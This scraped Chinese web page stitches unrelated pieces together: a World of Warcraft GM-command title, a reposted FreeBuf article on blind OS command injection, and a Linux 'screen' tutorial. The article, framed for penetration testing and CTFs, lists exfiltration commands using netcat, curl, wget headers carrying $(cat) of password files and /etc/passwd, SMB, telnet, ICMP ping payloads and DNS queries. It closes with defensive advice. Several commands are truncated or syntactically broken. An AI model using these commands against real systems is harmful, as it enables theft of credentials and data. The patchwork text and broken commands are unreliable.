有完成的任务如果想退出的话,该怎么下wow gm命令完成任务

查看: 2535|回复: 0
技术分析:攻击者是如何利用系统命令盲注实现“拖库”的?
在渗透测试或者CTF挑战中,你可能会遇到一个需要用户输入文本信息的应用程序,该应用会将用户的输入作为参数传递给一个系统命令或者给底层运行着任务的关联程序。而我们知道,如果没有对输入的信息进行校验或者过滤,那么该应用就可能被利用来进行“操作系统命令注入”。
对于攻击者来说,他可以通过注入漏洞,利用应用程序的权限来执行命令。在这种背景下,目前我们在实际的应用案例中,也观察到这种类型的攻击漏洞,存在于大量的应用程序。而针对的应用程序往往是以下的应用类型,例如:
•可以发送邮件到用户指定地址的应用程序。•可以监控企业服务器运行情况的应用程序•使用基于用户输入的第三方工具来完成传输报告的应用程序在渗透测试或者CTF中,在确认了漏洞之后,你可能开始对目标主机上感兴趣的区域进行探测分析了,希望能找到奖杯或者其他有用的信息,如,
操作系统密码文件操作系统配置文件数据库文件应用程序源代码举一个基本的例子,通过注入Windows命令“type”,作为一个参数进行传递,去读取服务器上的一个文件,最后返回相关文本信息。
很多时候,需要对正在执行的命令作中断。可以想象一下,一个系统监测应用软件,在监测主机存活状态时,会去ping一个ip地址,检测主机是否在线。那么在系统的底层也会执行用户输入的IP地址,如
ping –c 5 xxx.xxx.xxx.xxx如果在应用程序已经运行ping命令之后,你还想运行其他命令的话,可以参考以下的注入命令方式:
在上个例子中,我们通过“type”命令,在HTTP响应之后,返回服务器上的相应的文本信息。那么在实际环境中,往往在注入命令之后,没有任何的输出返回,那么展开注入的方式被称为“操作系统命令盲注”。
在这种情况下我们如何找到有用的信息?下面将详细介绍一些方法,可以无需上传 web shell 到主机上。
第一个例子是通过使用“瑞士军刀”netcat来实现的。相信对于诸位来说,Netcat并不陌生,甚至对于很多人来说,用了许久仍然也是爱不释手。简单来说,它是一款可以读、写TCP或UDP网络连接的工具。如果在目标服务器上运行着netcat,那么你可以利用它来建立监听端,然后将输出的系统操作命令重定向到监听端服务器上。
通过以下管道,将文件重定向到监听端上。
nc –l –p {port} & {file/to/extract}这样能从你的主机上连接到目标服务器上的监听端,然后重定向标准输出。以下是展示如何将 /etc/passwd重定向到主机上的。
如果主机运行的是Windows系统,以及netcat存在类似的攻击可能,可以尝试用下面的命令:
type {file to extract}&&| nc -L -p {port}cURL
cURL是一个使用多种协议传输数据的命令行工具和库,是一个非常有用的数据库下载工具。如果目标服务器有 cURL,那么我们仍然可以利用它来post文件到指定的服务器上或者通过其他协议来传输文件,如FTP/SCP/TFTP/TELNET等协议。
在你已经确认了一个系统操作命令注入漏洞之后,要通过 HTTP协议来传输文件,可以使用以下命令来post文件到web服务器上。
cat /path/to/file | curl –F “:data=@-“ 执行以上命令后,你可以在服务器日志上看到相关的文件内容。如果在渗透测试中,执行了以上操作, 同时需要web 服务器也确保配置使用ssl,保护客户端数据不被传播到网络上。以下展示了将/etc/passwd内容作为一个请求返回。
CURL 命令也能够被用来通过FTP来传输文件。同样的,如果你能确认一个操作系统命令注入漏洞时,可以用以下命令来传输文件到 FTP服务器上。
curl –T {path to file}
–user {username}:{password}以下是使用FTP将文件从目标服务器传输到FTP服务器上。
当然,cURL也可以使用其他的协议进行传输,如之前提到的SCP, TFTP 或TELNET,这里就不再一一介绍了。
wget是一个从网络上自动下载文件的自由工具。它支持HTTP,HTTPS和FTP协议,并可以使用HTTP代{过}{滤}理. 所谓的自动下载是指,wget可以在用户退出系统之后仍然在后台执行。这意味这你可以登录系统,启动一个wget下载任务,接着退出系统,而wget将在后台执行直到任务完成。
同时也可以使用WGET提交一个包含header报文头部的请求到服务器,格式如下,
–header=’name:value’可以通过以上的这种方式,抓取想要的数据。可以将需要抓取的文件名称路径设置为header的值。
wget –header=”EVIL:$(cat /data/secret/password.txt)”我们可以从web 服务器上的日志看到相应的效果,如下,
我们也可以使用标签记号来将一个命令封装到在执行原始命令的数据里面去。下一个例子展示了如何取回/etc/passwd文件。
wget –header=”evil:`cat /etc/passwd | xargs echo –n`”
实际上,也可以使用 WGET提交一个post请求到我们的web服务器上,接着通过使用 ‘—post-data’ 在发送请求的主体中加入字符串数据。或者使用 ‘—post-file’来将文件传输到web服务器。操作命令及效果如下
wget –post-data exfil=`cat /data/secret/secretcode.txt`
wget –post-file trophy.php
通过SMB协议,在目标服务器和主机之间建立网络共享连接,然后将目标服务器上的文件做分享,接着就可以在主机端将分享的文件copy下来啦。操作的命令如下,
net use h: \\xxx.xxx.xxx.xxx\web /user:{username} {password} && copy {File to Copy} h:\{filename}.txt操作效果如下:
如果telnet客户端是在远程服务器上,那么我们可以利用这个条件传输一个文件到主机的监听器上,通过以下操作命令,
telnet xxx.xxx.xxx.xxx {port} & {file to transfer}操作效果如下:
如果你针对的目标主机已经被加固,有的工具诸如netcat, wget 或者CURL已经被移除。那对于数据库下载来说,虽然有难度,但是还是有另外的一些技术可以用的。首先,尝试让这主机ping你的机器,然后看ICMP报文是否被防火墙过滤,如果没有被过滤,而主机底层系统又是Linux的话,我们就能够将数据通过ICMP echo请求,使用“ –p flag”来进行传输文件。
首先,我们需要将文件转换为十六进制,然后将数据插入到数据包中。这个可以通过下面的例子认识下,
cat password.txt | xxd -p -c 16 | do ping -p $exfil -c 1 xxx.xxx.xxx. done 通过Wireshark,我们能观察到接收到的数据包中已经包含了我们的数据,
跟ping命令的原理相似, DNS也能被用来进行数据库下载。这次我们将用每行数据作为一个DNS查询的主机名。通过监测网络流量,可以在我们的机器上重组数据包,还原原始文件。在这个实例中,下面的命令将作为我们请求部分提交给服务器。
cat /data/secret/password.txt | do host $ 192.168.107.135; done操作效果如下,
可以一个脚本,将接收到的DNS数据包重组为原始文件:
基于上述拖库方法的防护
在本文中我们展示了使用一些方法进行拖库。那么,你如何去预防这样的事情发生?
1、如果可能的话,尽量避免将用户输入的信息作为操作系统命令的参数。2、所有的用户输入应该进行校验。最好的方式是将采用白名单的方式,将合法的字符串添加到白名单列表,其他的则为过滤。3、定期进行代码审查和渗透测试,以确保能够检测出应用漏洞,并能快速修复漏洞。 同时在修复的过程中,应积极跟进修复情况,确认被发现的漏洞已被修复的成功。而对于web应用服务器也应该进行加固,确保减少服务器缺陷带来的影响,具体如下,
1、将其他不必要的工具移除,像能被利用进行攻击的工具cURL, Wget 或NetCat等;2、根据最小权限原则,保持以低权限的特权帐户运行Web服务程序;3、确保对网络应用程序日志进行定期审查,以确定来自网络的攻击,审查周期最低应保持在每三天一次,最好可以达到每天一次;4、在内部加强数据流量管控,通过内部防火墙防止攻击者将数据回传至其服务器。*原文:,FB小编troy编译,转载请注明来自FreeBuf黑客与极客()
Copyright & KaFan & All Rights Reserved.
Powered by Discuz! X3.1( 苏ICP备号 ) GMT+8,screen ssh 上边虚拟窗口的运行_Linux_第七城市
screen ssh 上边虚拟窗口的运行
作为linux服务器管理员,经常要使用ssh登陆到远程linux机器上做一些耗时的操作。 也许你遇到过使用telnet或SSH远程登录linux,运行一些程序。如果这些程序需要运行很长时间(几个小时),而程序运行过程中出现网络故障,或者客户机故障,这时候客户机与远程服务器的链接将终端,并且远程服务器没有正常结束的命令将被迫终止。 又比如你SSH到主机上后,开始批量的scp命令,如果这个ssh线程断线了,scp进程就中断了。在远程服务器上正在运行某些耗时的作业,但是工作还没做完快要下班了,退出的话就会中断操作了,如何才好呢? 我们利用screen命令可以很好的解决这个问题。实现在断开SSH的情况下,在服务器上继续执行程序。 那什么是screen命令? Screen被称之为一个全屏窗口管理器,用他可以轻松在一个物理终端上获得多个虚拟终端的效果。 Screen功能说明: 简单来说,Screen是一个可以在多个进程之间多路复用一个物理终端的窗口管理器,这意味着你能够使用一个单一的终端窗口运行多终端的应用。Screen中有会话的概念,用户可以在一个screen会话中创建多个screen窗口,在每一个screen窗口中就像操作一个真实的telnet/SSH连接窗口那样。 Screen命令语法: screen [-AmRvx -ls -wipe][-d ][-h ][-r ][-s ][-S ] Screen命令参数: -A -[r|R] 将所有的视窗都调整为目前终端机的大小。 -c filename 用指定的filename文件替代screen的配置文件’.screenrc’. -d [pid.tty.host] 断开screen进程(使用该命令时,screen的状态一定要是Attached,也就是说有用户连在screen里)。一般进程的名字是以pid.tty.host这种形式表示(用screen -list命令可以看出状态)。 -D [pid.tty.host] 与-d命令实现一样的功能,区别就是如果执行成功,会踢掉原来在screen里的用户并让他logout。 -h
  指定视窗的缓冲区行数。 -ls或–list 显示目前所有的screen作业。 -m 即使目前已在作业中的screen作业,仍强制建立新的screen作业。 -p number or name 预先选择一个窗口。 -r [pid.tty.host] 恢复离线的screen进程,如果有多个断开的进程,需要指定[pid.tty.host] -R先试图恢复离线的作业。若找不到离线的作业,即建立新的screen作业。 -s shell 指定建立新视窗时,所要执行的shell。 -S
指定screen作业的名称。(用来替代[pid.tty.host]的命名方式,可以简化操作). -v 显示版本信息。 -wipe检查目前所有的screen作业,并删除已经无法使用的screen作业。 -x 恢复之前离线的screen作业。 Screen命令的常规用法: screen -d -r:连接一个screen进程,如果该进程是attached,就先踢掉远端用户再连接。 screen -D -r:连接一个screen进程,如果该进程是attached,就先踢掉远端用户并让他logout再连接 screen -ls或者-list:显示存在的screen进程,常用命令 screen -m:如果在一个Screen进程里,用快捷键crtl+a c或者直接打screen可以创建一个新窗口,screen -m可以新建一个screen进程。 screen -dm:新建一个screen,并默认是detached模式,也就是建好之后不会连上去。 screen -p number or name:预先选择一个窗口。 Screen实现后台运行程序的简单步骤: 1> 要进行某项操作时,先使用命令创建一个Screen: [linux@user~]$ screen -S test1 2>接着就可以在里面进行操作了,如果你的任务还没完成就要走开的话,使用命令保留Screen: [linux@user~]$ Ctrl+a+d #按Ctrl+a,然后再按d即可保留Screen [detached] #这时会显示出这个提示,说明已经保留好Screen了 如果你工作完成的话,就直接输入: [linux@user~]$ exit #这样就表示成功退出了 [screen is terminating] 3> 如果你上一次保留了Screen,可以使用命令查看: [linux@user~]$ screen -ls There is a screen on: 9649.test1 (Detached) 恢复Screen,使用命令: [linux@user~]$ screen -r test1 (or 9649) Screen命令中用到的快捷键 Ctrl+a c :创建窗口 Ctrl+a w :窗口列表 Ctrl+a n :下一个窗口 Ctrl+a p :上一个窗口 Ctrl+a 0-9 :在第0个窗口和第9个窗口之间切换 Ctrl+a K(大写) :关闭当前窗口,并且切换到下一个窗口(当退出最后一个窗口时,该终端自动终止,并且退回到原始shell状态) exit :关闭当前窗口,并且切换到下一个窗口(当退出最后一个窗口时,该终端自动终止,并且退回到原始shell状态) Ctrl+a d :退出当前终端,返回加载screen前的shell命令状态 Linux的screen命令挺不错,在服务器上做点什么费时的工作就不用愁了!
最新教程周点击榜
微信扫一扫

我要回帖

更多关于 wow完成任务命令 的文章

 

随机推荐